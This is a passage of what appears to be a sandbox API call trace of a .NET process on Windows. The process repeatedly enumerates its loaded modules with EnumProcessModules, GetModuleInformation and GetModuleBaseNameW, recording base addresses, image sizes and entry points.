GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.610] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.610] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.610] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.610] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.610] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.611] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.611] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.611] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.611] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.612] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.612] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.612] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.613] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.613] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.613] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.614] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.614] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.614] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.615] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.615] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.616] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.616] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.617] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.617] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.618] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.618] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.619] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.619] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.620] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.620] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18e9bc, cb=0xc | out: lpmodinfo=0x18e9bc*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0216.621] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x75640000, lpBaseName=0x18e7b4, nSize=0x104 | out: lpBaseName="VERSION.dll") returned 0xb [0216.725] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpSrch="\\system.ni.dll") returned 0x0 [0216.726] GetCurrentProcess () returned 0xffffffff [0216.726] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d79c, cb=0x1000, lpcbNeeded=0x18e9b0 | out: lphModule=0x18d79c, lpcbNeeded=0x18e9b0) returned 1 [0216.726] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.726] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.727] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.727] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.727] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.727] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.727] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.727] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.728] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.728] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.728] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.728] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.729] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.729] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.729] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.730] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.730] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.731] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.731] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.731] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.732] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.732] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.732] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.733] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.733] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.734] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.734] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.735] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.735] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.736] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.736] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.737] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.737] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.738] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0216.739] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x75640000, lpBaseName=0x18e79c, nSize=0x104 | out: lpBaseName="VERSION.dll") returned 0xb [0216.740] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpSrch="\\system.ni.dll") returned 0x0 [0216.746] GetCurrentProcess () returned 0xffffffff [0216.746] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18e204, cb=0x1000, lpcbNeeded=0x18f418 | out: lphModule=0x18e204, lpcbNeeded=0x18f418) returned 1 [0216.747] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.747] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.747] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.747] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.747] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.747] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.748] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.748] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.748] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.748] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.748] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.749] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.749] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.749] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.749] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.750] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.750] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.750] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.751] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.751] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.752] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.752] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.752] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.753] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.753] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.754] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.754] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.755] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.755] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.756] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.756] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.757] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.757] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.758] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74f10000, lpBaseName=0x18f204, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0216.793] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpSrch="\\system.ni.dll") returned 0x0 [0216.810] GetCurrentProcess () returned 0xffffffff [0216.810] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18e21c, cb=0x1000, lpcbNeeded=0x18f430 | out: lphModule=0x18e21c, lpcbNeeded=0x18f430) returned 1 [0216.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.812] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.812] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.812] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.812] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.812] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18f424, cb=0xc | out: 